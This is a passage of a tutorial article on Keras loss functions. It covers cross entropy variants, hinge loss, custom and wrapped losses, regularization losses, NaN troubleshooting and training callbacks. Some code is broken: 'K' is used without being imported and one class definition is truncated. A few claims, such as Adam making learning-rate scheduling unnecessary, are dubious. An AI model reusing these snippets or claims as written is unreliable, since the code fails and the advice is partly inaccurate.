keras.layers.Dense(1, activation='sigmoid') #Sigmoid for probabilistic distribution ]) model.compile(optimizer='sgd', loss=keras.losses.BinaryCrossentropy(), metrics=['acc'])# binary cross entropy model.fit(np.array([[10.0, 20.0],[20.0,30.0],[30.0,6.0], [8.0, 20.0]]),np.array([1,1,0,1]) ,epochs=10) This will train the model using Binary Cross Entropy Loss function. b. Categorical Cross Entropy Categorical Cross Entropy is the cross entropy that is used for multi-class classification. This means for a single training example, you have n probabilities, and you take the class with maximum probability where n is number of classes. Mathematically, you can write it as: This double sum is over the N number of examples and C categories. The term 1yi ∈ Cc shows that the ith observation belongs to the cth category. The Pmodel[yi ∈ Cc] is the probability predicted by the model for the ith observation to belong to the cth category. When there are more than 2 probabilities, the neural network outputs a vector of C probabilities, with each probability belonging to each class. When the number of categories is just two, the neural network outputs a single probability ŷi , with the other one being 1 minus the output. This is why the binary cross entropy looks a bit different from categorical cross entropy, despite being a special case of it. Standalone Implementation You will create a Categorical Cross Entropy object from keras.losses and pass in our true and predicted labels, on which it will calculate the Cross Entropy and return a Tensor. Note that you have to provide a matrix that is one hot encoded showing probability for each class, as shown in this example. import keras import numpy as np y_true = [[0, 1, 0], [0, 0, 1]] #3classes y_pred = [[0.05, 0.95, 0], [0.1, 0.5, 0.4]] loss = keras.losses.CategoricalCrossentropy() print(f"CCE LOSS VALUE IS {loss(y_true, y_pred).numpy()}") Implementation using compile method When implemented using the compile method, you have to design a model in Keras, and compile it using Categorical Cross Entropy loss. Now when the model is trained, it is calculating the loss based on categorical cross entropy, and updating the weights according to the given optimizer. import keras import numpy as np from keras.utils import to_categorical #to one hot encode the data model = keras.models.Sequential([ keras.layers.Dense(16, input_shape=(2,), activation='relu'), keras.layers.Dense(8, activation='relu'), keras.layers.Dense(3, activation='softmax') #Softmax for multiclass probability ]) model.compile(optimizer='sgd', loss=keras.losses.CategoricalCrossentropy(), metrics=['acc'])# categorical cross entropy model.fit(np.array([[10.0, 20.0],[20.0,30.0],[30.0,6.0], [8.0, 20.0], [-1.0, -100.0], [-10.0, -200.0]]) ,to_categorical(np.array([1,1,0,1, 2, 2])) ,epochs=10) Here, it will train the model on our dummy dataset. c. Sparse Categorical Cross Entropy Mathematically, there is no difference between Categorical Cross Entropy, and Sparse Categorical Cross Entropy according to official documentation. Use this cross entropy loss function when there are two or more label classes. We expect labels to be provided as integers. If you want to provide labels using one-hot representation, please use CategoricalCrossentrop loss. There should be # classes floating point values per feature for y_pred and a single floating point value per feature for y_true.“ As you have seen earlier in Categorical Cross Entropy that one hot matrix has been passed as the true labels, and predicted labels. An example of which is as follows: to_categorical(np.array([1,1,0,1, 2, 2])) For using sparse categorical cross entropy in Keras, you need to pass in the label encoded labels. You can use sklearn for this purpose. Lets see this example to understand better. from sklearn.preprocessing import LabelEncoder le = LabelEncoder() output = le.fit_transform(np.array(['High chance of Rain', 'No Rain', 'Maybe', 'Maybe', 'No Rain', 'High chance of Rain'])) Here a LabelEncoder object has been created, and the fit_transform method is used to encode it. The output of it is as follows. Standalone Implementation To perform standalone implementation, you need to perform label encoding on labels. There should be n floating point values per feature for each true label, where n is the total number of classes. from sklearn.preprocessing import LabelEncoder t = LabelEncoder() y_pred = [[0.1,0.1,0.8], [0.1,0.4,0.5], [0.5,0.3,0.2], [0.6,0.3,0.1]] y_true = t.fit_transform(['Rain', 'Rain', 'High Changes of Rain', 'No Rain']) loss = keras.losses.SparseCategoricalCrossentropy() print(f"Sparse Categorical Loss is {loss(y_true, y_pred).numpy()} ") Implementation using model.compile To implement Sparse Categorical Cross Entropy in a deep learning model, you have to design the model, and compile it using the loss sparse categorical cross entropy. Remember to perform label encoding of your class labels so that sparse categorical cross entropy can work. import keras import numpy as np from sklearn.preprocessing import LabelEncoder model = keras.models.Sequential([ keras.layers.Dense(16, input_shape=(2,), activation='relu'), keras.layers.Dense(8, activation='relu'), keras.layers.Dense(3, activation='softmax') #Softmax for multiclass probability ]) le = LabelEncoder() model.compile(optimizer='sgd', loss=keras.losses.SparseCategoricalCrossentropy(), metrics=['acc'])# sparse categorical cross entropy Now the model will be trained on the dummy dataset. model.fit(np.array([[10.0, 20.0],[20.0,30.0],[30.0,6.0], [8.0, 20.0], [-1.0, -100.0], [-10.0, -200.0]]) ,le.fit_transform(np.array(['High chance of Rain', 'High chance of Rain', 'High chance of Rain', 'Maybe', 'No Rain', 'No Rain'])) ,epochs=10) The model has been trained, where the loss is calculated using sparse categorical cross entropy, and the weights have been updated using stochastic gradient descent. 2. Hinge Loss Hinge loss is a commonly used loss function for classification problems. It is mainly used in problems where you have to do ‘maximum-margin’ classification. A common example of which is Support Vector Machines. The following image shows how maximum margin classification works. Source: Stanford NLP Group The mathematical formula for hinge loss is: Where yi is the actual label and ŷ is the predicted label. When prediction is positive, value goes on one side, and when the prediction is negative, value goes totally opposite. This is why it is known as maximum margin classification. Standalone Implementation: To perform standalone implementation of Hinge Loss in Keras, you are going to use Hinge Loss Class from keras.losses. import keras import numpy as np y_true = [[0., 1.], [0., 0.]] y_pred = [[0.6, 0.4], [0.4, 0.6]] h = keras.losses.Hinge() print(f'Value for Hinge Loss is {h(y_true, y_pred).numpy()}') Implementation using compile Method To implement Hinge loss using compile method, you will design our model and compile it where you will mention our loss as Hinge. Note that Hinge Loss works best with tanh as the activation in the last layer. import keras import numpy as np model = keras.models.Sequential([ keras.layers.Dense(16, input_shape=(2,), activation='relu'), keras.layers.Dense(8, activation='tanh'), keras.layers.Dense(1, activation='tanh') ]) model.compile(optimizer='adam', loss=keras.losses.Hinge(), metrics=['acc'])# Hinge Loss from sklearn.preprocessing import LabelEncoder le = LabelEncoder() model.fit(np.array([[10.0, 20.0],[20.0,30.0],[30.0,6.0], [-1.0, -100.0], [-10.0, -200.0]]) ,le.fit_transform(np.array(['High chance of Rain', 'High chance of Rain', 'High chance of Rain', 'No Rain', 'No Rain'])) ,epochs=10, batch_size=5) This will train the model using Hinge Loss and update the weights using Adam optimizer. Custom Loss Functions So far you have seen some of the important cost functions that are widely used in industry and are good and easy to understand, and are built-in by famous deep learning frameworks such as Keras, or PyTorch. These built-in loss functions are enough for most of the typical tasks such as classification, or regression. But there are some tasks, which can not be performed well using these built-in loss functions, and require some other loss that is more suitable for that task. For that purpose, a custom loss function is designed that calculates the error between the predicted value and actual value based on custom criteria. Why you should use Custom Loss Artificial Intelligence in general and Deep Learning in general is a very strong research field. There are various industries using Deep Learning to solve complex scenarios. There is a lot of research on how to perform a specific task using Deep Learning. For example there is a task on generating different recipes of food using the picture of the food. Now on papers with code (a famous site for deep learning and machine learning research papers), there are a lot of research papers on this topic. Now Imagine you are reading a research paper where the researchers thought that using Cross Entropy, or Mean Squared Error, or whatever the general loss function is for that specific type of the problem is not good enough. It may require you to modify it according to the need. This may involve adding some new parameters, or a whole new technique to achieve better results. Now when you are implementing that problem, or you hired some data scientists to solve that specific problem for you, you may find that this specific problem is best solved using that specific loss function which is not available by default in Keras, and you need to implement it yourself. A custom loss function can improve the models performance significantly, and can be really useful in solving some specific problems. To create a custom loss, you have to take care of some rules. - The loss function must only take two values, that are true labels, and predicted labels. This is because in order to calculate the error in prediction, these two values are needed. These arguments are passed from the model itself when the model is being fitted. For example: def customLoss(y_true, y_pred): return loss model.compile(loss=customLoss, optimizer='sgd') 2. Make sure that you are making the use of y_pred or predicted value in the loss function, because if you do not do so, the gradient expression would not be defined, and it can throw some error. 3. You can now simply use it in model.compile function just like you would use any other loss function. Example: Let’s say you want to perform a regression task where you want to use a custom loss function that divides the loss value of Mean Squared Error by 10. Mathematically, it can be denoted as: Now to implement it in Keras, you need to define a custom loss function, with two parameters that are true and predicted values. Then you will perform mathematical functions as per our algorithm, and return the loss value. Note that Keras Backend functions and Tensorflow mathematical operations will be used instead of numpy functions to avoid some silly errors. Keras backend functions work similarly to numpy functions. import keras import numpy as np from tensorflow.python.ops import math_ops def custom_loss(y_true, y_pred): diff = math_ops.squared_difference(y_pred, y_true) #squared difference loss = K.mean(diff, axis=-1) #mean over last dimension loss = loss / 10.0 return loss Here you can see a custom function with 2 parameters that are true and predicted values, and the first step was to calculate the squared difference between the predicted labels and the true labels using squared difference function from Tensorflow Python ops. Then the mean is calculated to complete the mean squared error, and divided by 10 to complete our algorithm. The loss value is then returned. You can use it in our deep learning model, by compiling our model and setting the loss function to the custom loss defined above. model = keras.Sequential([ keras.layers.Dense(10, activation='relu', input_shape=(1,)), keras.layers.Dense(1) ]) model.compile(loss=custom_loss, optimizer='sgd') X_train = np.array([[10.0],[20.0], [30.0],[40.0],[50.0],[60.0],[10.0], [20.0]]) y_train = np.array([6.0, 12, 18,24,30, 36,6, 12]) #dummy data model.fit(X_train, y_train, batch_size=2, epochs=10) Passing multiple arguments to a Keras Loss Function Now, if you want to add some extra parameters to our loss function, for example, in the above formula, the MSE is being divided by 10. Now if you want to divide it by any value that is given by the user, you need to create a Wrapper Function with those extra parameters. Wrapper function in short is a function whose job is to call another function, with little or no computation. The additional parameters will be passed in the wrapper function, while the main 2 parameters will remain the same in our original function. Let’s see it with the code. def wrapper(param1): def custom_loss_1(y_true, y_pred): diff = math_ops.squared_difference(y_pred, y_true) #squared difference loss = K.mean(diff, axis=-1) #mean loss = loss / param1 return loss return custom_loss_1 To do the standalone computation using Keras, You will first create the object of our wrapper, and then pass in it y_true and y_pred parameters. loss = wrapper(10.0) final_loss = loss(y_true=[[10.0,7.0]], y_pred=[[8.0, 6.0]]) print(f"Final Loss is {final_loss.numpy()}") You can use it in our deep learning models by simply calling the function by using appropriate value for our param1. model1 = keras.Sequential([ keras.layers.Dense(10, activation='relu', input_shape=(1,)), keras.layers.Dense(1) ]) model1.compile(loss=wrapper(10.0), optimizer='sgd') Here the model has been compiled using the value 10.0 for our param1. The model can be trained and the results can be seen . model1.fit(X_train, y_train, batch_size=2, epochs=10) Creating Custom Loss for Layers Loss functions that are applied to the output of the model (i.e what you have seen till now) are not the only way to calculate and compute the losses. The custom losses for custom layers or subclassed models can be computed for the quantities which you want to minimize during the training like the regularization losses. These losses are added using add_loss() function from keras.Layer. For example, if you want to add custom l2 regularization in our layer, the mathematical formula of which is as follows: You can create your own custom regularizer class which should be inherited from keras.layers.. from keras.layers import Layer from tensorflow.math import reduce_sum, square class MyActivityRegularizer(Layer): def __init__(self, rate=1e-2): super(MyActivityRegularizer, self).__init__() self.rate = rate def call(self, inputs): self.add_loss(self.rate * reduce_sum(square(inputs))) return inputs Now, since the regularized loss has been defined, you can simply add it in any built-in layer, or create our own layer. class SparseMLP(Layer): """Stack of Linear layers with our custom) Here custom sparse MLP layer has been defined, where when stacking two linear layers, The custom loss function has been added which will regularize the weights of our deep learning model. It can be tested: mlp = SparseMLP(1) y = mlp(np.random.normal(size=(10, 10))) print(mlp.losses) # List containing one float32 scalar It returns a tf.Tensor, which can be converted into numpy using mlp.losses.numpy() method. Dealing with NaN in Custom Loss in Keras There are many reasons that our loss function in Keras gives NaN values. If you are new to Keras or practical deep learning, this could be very annoying because you have no idea why Keras is not giving the desired output. Since Keras is a high level API, built over low level frameworks such as Theano, Tensorflow etc. it is difficult to know the problem. There are many different reasons for which many people have received NaN in their loss, like shown in this figure below Some of the main reasons, which are very common, are as follows: 1. Missing Values in training dataset This is one of the most common reasons for why the loss is nan while training. You should remove all the missing values from your dataset, or fill them using a good strategy, such as filling with mean. You can check nan values by using Pandas built in functions. print(np.any(np.isnan(X_test))) And if there are any null values, you can either use pandas fillna() function to fill them, or dropna() function to drop those values. 2. Loss is unable to get traction on training dataset This means that the custom loss function you designed, is not suitable for the dataset, and the business problem you are trying to solve. You should look at the problem from another perspective, and try to find a suitable loss function for your problem. 3. Exploding Gradients Exploding Gradients is a very common problem especially in large neural networks where the value of your gradients become very large. This problem can be solved using Gradient Clipping. In Keras, you can add gradient clipping to your model when compiling it by adding a parameterclipnorm=x in the selected choice of optimizer. This will clip all the gradients above the value x. For example: opt = keras.optimizers.Adam(clipnorm=1.0) This will clip all the gradients that are greater than 1.0. You can add it into your model as model.compile(loss=custom_loss, optimizer=opt) Using RMSProp optimizer function with heavy regularization also helps in diminishing the exploding gradients problem. 4. Dataset is not scaled Scaling and normalizing the dataset is important. Unscaled data can lead the neural network to behave very strangely. Hence it is advised to properly scale the data. There are 2 most commonly used scaling methods, and both of them are easily implementable in sklearn which is a famous Machine Learning Library in Python. - StandardScal 2. MinMax Scal 5. Dying ReLU problem A dead ReLU happens, when the relu function always outputs the same value (0 mostly). This means that it takes no role in the discrimination between the inputs. Once a ReLU reaches this state, it is unrecoverable because the function gradient at 0 is also 0, so gradient descent will not change the weights and the model will not improve. This can be improved by using the Leaky ReLU activation function, where there is a small positive gradient for negative inputs. y=0.01x when x < 0 say Hence, it is advised to use Leaky ReLU to avoid NaNs in your loss. In Keras, you can add a leaky relu layer as follows. keras.layers.LeakyReLU(alpha=0.3, **kwargs) 6. Not a good choice of optimizer function If you are using Stochastic Gradient Descent, then it is very likely that you are going to face the exploding gradients problem. One way to tackle it is by Scheduling Learning Rate after some epochs, but now due to more advancements and research it has been proven that using a per-parameter adaptive learning rate algorithm like Adam optimizer, you no longer need to schedule the learning rate. So there are chances that you are not using the right optimizer function. To use the ADAM optimizer function in Keras, you can use it from keras.optimizers class. keras.optimizers.Adam( learning_rate=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-07, amsgrad=False, name="Adam", **kwargs ) model.compile(optimizer= keras.optimizers.Adam(), loss=custom_loss) 7. Wrong Activation Function The wrong choice of activation function can also lead to very strange behaviour of the deep learning model. For example if you are working on a multi-class classification problem, and using the relu activation function or sigmoid activation function in the final layer instead of categorical_crossentropy loss function, that can lead the deep learning model to perform very weirdly. 8. Low Batch Size It has been seen that the optimizer functions on a very low batch size such as 16 or 32 are less stable, as compared to the batch size of 64 or 128. 9. High Learning Rate High learning rate can lead the deep learning model to not converge to optimum, and it can get lost somewhere in between. Hence it is advisable to use a lower amount of Learning Rate. It can also be improved using Hyper Parameter Tuning. 10. Different file type (for NLP Problems) If you are doing some textual problem, you can check your file type by running the following command. Linux $ file -i {input} OSX $ file -I {input} This will give you the file type. If that file type is ISO-8859-1 or us-ascii then try converting the file to utf-8 or utf-16le. Monitoring Keras Loss using Callbacks It is important to monitor your loss when you are training the model, so that you can understand different types of behaviours your model is showing. There are many callbacks introduced by Keras using which you can monitor the loss. Some of the famous ones are: 1. CSVLogger CSVLogger is a callback provided by Keras that can be used to save the epoch result in a csv file, so that later on it can be visualized, information could be extracted, and the results of epochs can be stored. You can use CSVLogger from keras.callbacks. from keras.callbacks import CSVLogger csv_logger = CSVLogger('training.csv') model.fit(X_train, Y_train, callbacks=[csv_logger]) This will fit the model on the dataset, and stores the callback information in a training.csv file, which you can load in a dataframe and visualize it. 2. TerminateOnNaN Imagine you set the training limit of your model to 1000 epochs, and your model starts showing NaN loss. You can not just sit and stare at the screen while the progress is 0. Keras provides a TerminateOnNan callback that terminates the training whenever NaN loss is encountered. import keras terNan = keras.callbacks.TerminateOnNaN() model.fit(X_train, Y_train, callbacks=[terNan]) 3. RemoteMonitor RemoteMonitor is a powerful callback in Keras, which can help us monitor, and visualize the learning in real time. To use this callback, you need to clone hualos by Francis Chollet, who is the creator of Keras. git clone cd hualos python api.py Now you can access the hualos at localhost:9000 from your browser. Now you have to define the callback, and add it to your model while training monitor = RemoteMonitor() hist = model.fit( train_X, train_Y, nb_epoch=50, callbacks=[ monitor ] ) During the training, the localhost:9000 is automatically updated, and you can see the visualizations of learning in real time. 4. EarlyStopping EarlyStopping is a very useful callback provided by Keras, where you can stop the training earlier than expected based on some monitor value. For example you set your epochs to be 100, and your model is not improving after the 10th epoch. You can not sit and stare at the screen so that model may finish the training, and you can change the architecture of the model. Keras provides EarlyStopping callback, which is used to stop the training based on some criteria. es = keras.callbacks.EarlyStopping( monitor="val_loss", patience=3, ) Here, the EarlyStopping callback has been defined, and the monitor has been set to the validation loss value. And it will check that if the value of validation loss does not improve for 3 epochs, it will stop the training. This article should give you good foundations in dealing with loss functions, especially in Keras, implementing your own custom loss functions which you develop yourself or a researcher has already developed, and you are implementing that, their implementation using Keras a deep learning framework, avoiding silly errors such as repeating NaNs in your loss function, and how you should monitor your loss function in Keras. Hopefully, now you have a good grip on these topics: - What are Loss Functions - What are Evaluation Metrics? - Commonly used Loss functions in Keras (Regression and Classification) - Built-in loss functions in Keras - What is the custom loss function? - Why should you use a Custom Loss? - Implementation of common loss functions in Keras - Custom Loss Function for Layers i.e Custom Regularization Loss - Dealing with NaN values in Keras Loss - Monitoring Keras Loss using callbacks
https://cnvrg.io/keras-custom-loss-functions/
CC-MAIN-2021-43
refinedweb
5,937
54.52
Scala ReflectionScala Reflection Scala 3 introduced many exciting new language features, and broke one old one. Scala 2's runtime reflection has been eliminated in favor of using compile-time macros to reflect on classes. This approach is a mixed blessing. If the type you want to reflect on is known at compile-time then performance of this new mechanism is very fast, however if you only know the reflected type at run-time you're basically out of luck. Well... not entirely out of luck. Scala 3 offers something called Tasty Inspection that can reflect on a run-time type but at a severe performance penalty, as this approach involves file IO to read your class' .tasty file. Tasty Inspection works, but it is orders of magnitude slower than Scala 2 run-time reflection. The scala-reflection project seeks to accomplish two goals: Make Scala 3 reflection a little more approachable by exposing higher-level abstractions for reflected things, vs using macros to dive through Scala 3 internals Allow for a true, performant, runtime reflection capability That second goal, runtime reflection, poses a unique challenge. Just how do you provide a runtime reflection ability in a language that doesn't have that facility? How, indeed! The solution offered by this library is to provide a compiler plugin for your code. What the plugin does is capture reflected information on all your compiled classes at compile-time and serialize it into annotations readable at runtime. In principle, this isn't dissimilar from how Scala 2 runtime reflection works. Use of the compiler plugin is optional, but highly recommended as it avoids the very costly file IO for runtime reflection. The results speak for themselves. Here's a sample of using scala-reflection on a few complex test classes in non-plugin mode and as a compiler plug-in: Everything will still work fine if you elect not to use the plugin, or if you encounter classes that weren't compiled using the plugin. Performance will just be slower the first time a class is reflected upon. (The library caches, so subsequent reflection on an already-seen class is 1-2ms.). You can see from this chart that for these results the compiler plug-in is offering more than an order of magnitude improvement. ConfigurationConfiguration In your build.sbt file be sure you've set co.blocke's releases repo in bintray as a resolver and add the current version of the library to libraryDependences: libraryDependencies += "co.blocke" %% "scala-reflection" % CURRENT_VERSION (CURRENT_VERSION value can be taken from the 'maven central' badge in this github repo.) To use the compiler plugin mode (recommended) add this to your project's build.sbt: addCompilerPlugin("co.blocke" %% "scala-reflection" % CURRENT_VERSION) For best results compile all classes you intend to reflect on with this plugin enabled. Standard UsageStandard Usage This library defines a set of "Info" classes, which are high-level abstractions representing reflected information about various Scala classes and structures. Reflect on a class like this: import co.blocke.scala_reflection case class Thing(a: String) // >> Compile-time reflection using square brackets for type val macroRType: RType = RType.of[Thing] // returns ScalaCaseClassInfo // >> Run-time reflection using parentheses for type (will use compiler-plugin if enabled) val cname: String = getClassWeNeedFromSomewhere() val runtimeRType: RType = RType.of(Class.forName(cname)) In the second example you don't know the actual type of the class to reflect on until runtime, for example if it came from an external source like a REST call. If you're using the compiler plugin, the pre-reflected ScalaCaseClassInfo will be returned immediately, otherwise file IO will read your class' .tasty file and reflect on the class, which is very slow the first time we encounter this class (cached after that). Resolving Generic Classes using TraitsResolving Generic Classes using Traits The scala-reflection library was first envisioned to facilitate migrating ScalaJack serialization to Scala 3. One of ScalaJack's key features is its trait handling ability. trait Pet[T] { val name: String val numLegs: Int val special: T } case class Dog[T](name: String, numLegs: Int, special: T) extends Pet[T] case class Fish[T](name: String, numLegs: Int, special: T) extends Pet[T] val pet: Pet[Boolean] = Dog("Spot",4,true) When serializing pet, ScalaJack would generate JSON with a type hint like this: {"_hint":"com.mystuff.Dog","name":"Spot","numLegs":4,"special":true} The hint tells ScalaJack which specific Pet class to materialize upon reading this JSON (we're expecting only a Pet). So... you'll see here we just have a class name in the hint. How do we know the type of T? We're going to have to tell it: scalajack.read[Pet[Boolean]](js) Pet[Boolean] is a parameterized trait. We get the concrete class value "com.mystuff.Dog" from the JSON. We need to resolve Dog in terms of Pet[Boolean] to find the correct type of 'special'. We accomplish this feat in scala-reflection like this: val resolved = RType.inTermsOf[Pet[Boolean]](Class.forName("com.mystuff.Dog")) This will return a ScalaCaseClassInfo with field 'special' correctly typed to Boolean, which it learned about by studying the specific Pet trait you gave it in the square brackets. Here's what the process looks like internally: RType.of[Pet[Boolean]:RType.of[Pet[Boolean]: TraitInfo(com.foo.Pet) actualParamTypes: [ T: scala.Boolean ] with fields: name: java.lang.String numLegs: scala.Int special[T]: scala.Boolean RType.of(Class.forName("com.foo.Dog"):RType.of(Class.forName("com.foo.Dog"): ScalaCaseClassInfo(com.foo.Dog): fields: (0) name: java.lang.String (1) numLegs: scala.Int (2)[T] special: scala.Any RType.inTermsOf[Pet[Boolean]](Class.forName("com.foo.Dog")RType.inTermsOf[Pet[Boolean]](Class.forName("com.foo.Dog") ScalaCaseClassInfo(com.foo.Dog): fields: (0) name: java.lang.String (1) numLegs: scala.Int (2)[T] special: scala.Boolean If, for any reason, you wish NOT to have scala-reflection examine a class, you may annotate that class with @Skip_Reflection and scala-reflection will return an RType of UnknownInfo. Learning to Drive with MacrosLearning to Drive with Macros scala-reflection uses macros to the fullest extent possible to do the hard work of reflecting on types. Macros impact the compile/test cycle in ways that are non-intuitive at first. Think of this example: // File1.scala case class Foo(name: String) // File2.scala val fooRType = RType.of[Foo] In a non-macro implementation (e.g. Scala 2 runtime reflection) if you update Foo in File1.scala you naturally expect sbt to re-compile this file, and anything that depends on Foo, and the changes will be picked up in your program, and all will be well. That's not necessarily what happens with macros! Remember the macro code is run at compile-time. File2.scala needs to be re-compiled because the RType.of macro needs to be re-run to pick up your changes to Foo class in File1.scala. Unfortunately sbt doesn't pick up this dependency! If you don't know any better you'll just re-run your program after a change to File1.scala, like normal, and get a spectacular exception with exotic errors that won't mean much to you. The solution is you need to also recompile File2.scala. This means you will be doing more re-compiling with macro-based code than you would without the macros. It's an unfortunate cost of inconvenience and time, but the payoff is a dramatic gain in speed at runtime, and in the case of reflection in Scala 3, using macros is really the only way to accomplish reflection. StatusStatus At this point the library can reflect on quite a lot of things in the Scala ecosystem: - Scala 3 Tasty classes (parameterized or non-parameterized) w/annotations - Traits (including sealed traits) - Scala 2 case classes - Value Classes - Java classes (JavaBeans pattern) - Scala 3 enum / Scala 2 Enumeration - Scala 3 Union & Intersection types - Opaque type aliases - Try typed fields - Either - Option and Java Optional - Collections, incl. several Java Collections - Tuples See unit tests for detailed examples of usage. LimitationsLimitations No support for parameters in Intersection or Union types ( val t: X|Yor val u: X&Y). This is because union/intersection types don't appear to be implemented as full classes in Scala and we haven't yet figured out this would work in scala-reflection. The entire serialized RType tree (incl. any nested RTypes) must not exceed 64K bytes. This is so that it will fit into a JVM Annotation. (If this becomes a frequent show-stopper, there may be a way to extend this limitation, but we have no desire to prematurely over-engineer. Until we learn otherwise, 64K seems a reasonable amount.) AcknowledgementsAcknowledgements I wish to thank three people who have helped make this library possible, with their patient explanations and help on gitter. Learning the Scala 3 reflection internals was certainly a learning curve for me and these guys really helped me through it: Guillaume Martres (@smarter) Paolo G. Giarrusso (@Blaisorblade) Nicolas Stucki (@nicolasstucki) Release Notes:Release Notes: - 1.0.0 - First GA release - 1.0.0-RC2 - Match compatibility with Scala 3 RC2 - 1.0.0-M2 - Initial release for Scala 3.0.0-M2
https://index.scala-lang.org/gzoller/scala-reflection/scala-reflection/1.0.0?target=_3.x
CC-MAIN-2022-05
refinedweb
1,541
56.25
AWS Lambda is a serverless, event-driven compute service. Serverless does not mean there are no servers. It means you don’t manage or provision them. Someone else does that job for you. Event-driven means it uses events to trigger and communicate between services. When using lambda you just write the function and AWS manages the rest for you. It is integrated with many programming languages such as Python, Node.js, Java, C# and Golang. So you can pick the language you prefer. It is that flexible. Amazon S3 is a cloud object storage.S3 allows you to store objects in what they call “buckets”. A bucket is like a directory. It can be created in a particular region. But S3 bucket names are unique globally. When I said it is *like *a directory I mean it. Because inside a bucket there are no folders. It has a logical arrangement similar to folders separated by “/”. Bucket objects or files are always referenced by a key. The key is the full path. This is a simple activity you can try in AWS. Here you’d be using two AWS Services: Lambda and S3. As the first task let’s copy a file in the same S3 bucket. The code is simple. Create the S3 bucket and add an object. I assume that you have an object called “script.py” in the following source path. So the object key here is the entire “mybucket1/source/script.py”. mybucket1/source/script.py You want the destination path to be mybucket1/destination/script.py Create a Lambda function in the same region as the bucket is in. import boto3 def lambda_handler(event, context): # Creating the connection with the resource s3 = boto3.resource('s3') # Declaring the source to be copied copy_source = {'Bucket': 'mybucket1', 'Key': 'source/script.py'} bucket = s3.Bucket('mybucket1') # Copying the files to another folder bucket.copy(copy_source, 'destination/scriptCopy.py') Paste the above code and deploy the code. Save and Deploy Lambda Function When you create a Lambda function it creates an execution role with basic permissions (If you did not change anything). Make sure the Lambda function IAM Role has the following permissions before you test the function. Go to Configuration->Permissions. Open the Execution Role. IAM Role Lambda Function { "Version": "2012-10-17", "Statement": [ { "Sid": "VisualEditor0", "Effect": "Allow", "Action": [ "s3:PutObject", "s3:GetObject", "s3:GetBucketLocation" ], "Resource": [ "arn:aws:s3:::mybucket1/*", "arn:aws:s3:::mybucket1" ] }, { "Sid": "VisualEditor1", "Effect": "Allow", "Action": [ "s3-object-lambda:GetObject", "s3-object-lambda:PutObject" ], "Resource": "arn:aws:s3-object-lambda:Region:AccountID:accesspoint/*" } ] } As the second task let’s copy a file in one S3 bucket to another S3 bucket. The code is simple. You have to update one line. bucket = s3.Bucket('mybucket2') Update the correct permission to the other bucket too. { "Version": "2012-10-17", "Statement": [ { "Sid": "VisualEditor0", "Effect": "Allow", "Action": [ "s3:PutObject", "s3:GetObject", "s3:GetBucketLocation" ], "Resource": [ "arn:aws:s3:::mybucket1/*", "arn:aws:s3:::mybucket1", "arn:aws:s3:::mybucket2/*", "arn:aws:s3:::mybucket2" ] }, { "Sid": "VisualEditor1", "Effect": "Allow", "Action": [ "s3-object-lambda:GetObject", "s3-object-lambda:PutObject" ], "Resource": "arn:aws:s3-object-lambda:Region:AccountID:accesspoint/*" } ] } That’s all! Hope this helps. Thank you for reading.
https://plainenglish.io/blog/how-to-copy-a-file-using-aws-lambda
CC-MAIN-2022-40
refinedweb
532
53.17
A reference variable is an alias, that is, another name for an already existing variable. Once a reference is initialized with a variable, either the variable name or the reference name may be used to refer to the variable. References are often confused with pointers but three major differences between references and pointers are − − int i = 17; We can declare reference variables for i as follows. int& r = i; Read the & in these declarations as reference. Thus, read the first declaration as "r is an integer reference initialized to i" and read the second declaration as "s is a double reference initialized to d.". Following example makes use of references on int and double − #include <iostream> using namespace std; int main () { // declare simple variables int i; double d; // declare reference variables int& r = i; double& s = d; i = 5; cout << "Value of i : " << i << endl; cout << "Value of i reference : " << r << endl; d = 11.7; cout << "Value of d : " << d << endl; cout << "Value of d reference : " << s << endl; return 0; } When the above code is compiled together and executed, it produces the following result − Value of i : 5 Value of i reference : 5 Value of d : 11.7 Value of d reference : 11.7 References are usually used for function argument lists and function return values. So following are two important subjects related to C++ references which should be clear to a C++ programmer −
https://www.tutorialspoint.com/cplusplus/cpp_references.htm
CC-MAIN-2020-05
refinedweb
234
56.49
After writing the previous post, I wondered where else you might be able to use r-means to create accurate approximations. I thought maybe this would apply to the surface area of an ellipsoid, and a little searching around showed that Knud Thomsen thought of this in 2004. The general equation for the surface of an ellipsoid is If two of the denominators {a, b, c} are equal then there are formulas for the area in terms of elementary functions. But in general, the area requires special functions known as “incomplete elliptic integrals.” For more details, see this post. Here I want to focus on Knud Thomsen’s approximation for the surface area and its connection to the previous post. The previous post reported that the perimeter of an ellipse is 2πr where r is the effective radius. An ellipse doesn’t have a radius unless it’s a circle, but we can define something that acts like a radius by defining it to be the perimeter over 2π. It turns out that makes a very good approximation for the effective radius where x = (a, b). Here using the notation of Hardy, Littlewood, and Pólya. This suggests we define an effective radius for an ellipsoid and look for an approximation to the effective radius in terms of an r-mean. The area of a sphere is 4πr², so we define the effective radius of an ellipsoid as the square root of its surface area divided by 4π. So the effective radius of a sphere is its radius. Thomsen found that where x = (ab, bc, ac) and p = 1.6. More explicitly, Note that it’s the square of the effective radius that is an r-mean, and that the argument to the mean is not simply (a, b, c). I would have naively tried looking for a value of p so that the r-mean of (a, b, c) gives a good approximation to the effective radius. In hindsight, it makes sense in terms of dimensional analysis that the inputs to the mean have units of area, and so the output has units of area. The maximum relative error in Thomsen’s approximation is 1.178% with p = 1.6. You can tweak the value of p to reduce the worst-case error, but the value of 1.6 is optimal for approximately spherical ellipsoids. For an example, let’s compute the surface area of Saturn, the planet with the largest equatorial bulge in our solar system. Saturn is an oblate spheroid with equatorial diameter about 11% greater than its polar diameter. Assuming Saturn is a perfect ellipsoid, Thomsen’s approximation over-estimates its surface area by about 4 parts per million. By comparison, approximating Saturn as a sphere under-estimates its area by 2 parts per thousand. The code for these calculations, based on the code here, is given at the bottom of the post. Related posts Appendix: Python code from numpy import pi, sin, cos, arccos from scipy.special import ellipkinc, ellipeinc # Saturn in km equatorial_radius = 60268 polar_radius = 54364 a = b = equatorial_radius c = polar_radius phi = arccos(c/a) m = 1 temp = ellipeinc(phi, m)*sin(phi)**2 + ellipkinc(phi, m)*cos(phi)**2 ellipsoid_area = 2*pi*(c**2 + a*b*temp/sin(phi)) def rmean(r, x): n = len(x) return (sum(t**r for t in x)/n)**(1/r) approx_ellipsoid_area = 4*pi*rmean(1.6, (a*b, b*c, a*c)) r = (a*b*c)**(1/3) sphere_area = 4*pi*r**2 def rel_error(exact, approx): return (exact-approx)/approx print( rel_error(ellipsoid_area, sphere_area) ) print( rel_error(ellipsoid_area, approx_ellipsoid_area) )
https://www.johndcook.com/blog/2021/03/24/surface-area-ellipsoid/
CC-MAIN-2022-27
refinedweb
602
61.06
